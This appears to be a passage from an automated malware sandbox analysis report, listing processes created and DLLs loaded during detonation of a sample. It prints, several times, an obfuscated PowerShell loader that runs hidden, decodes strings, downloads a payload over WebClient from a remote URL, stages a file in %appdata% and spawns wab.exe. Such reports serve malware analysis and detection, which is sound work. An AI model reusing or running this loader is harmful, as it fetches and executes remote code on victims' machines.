IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHy
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOr
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHyJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
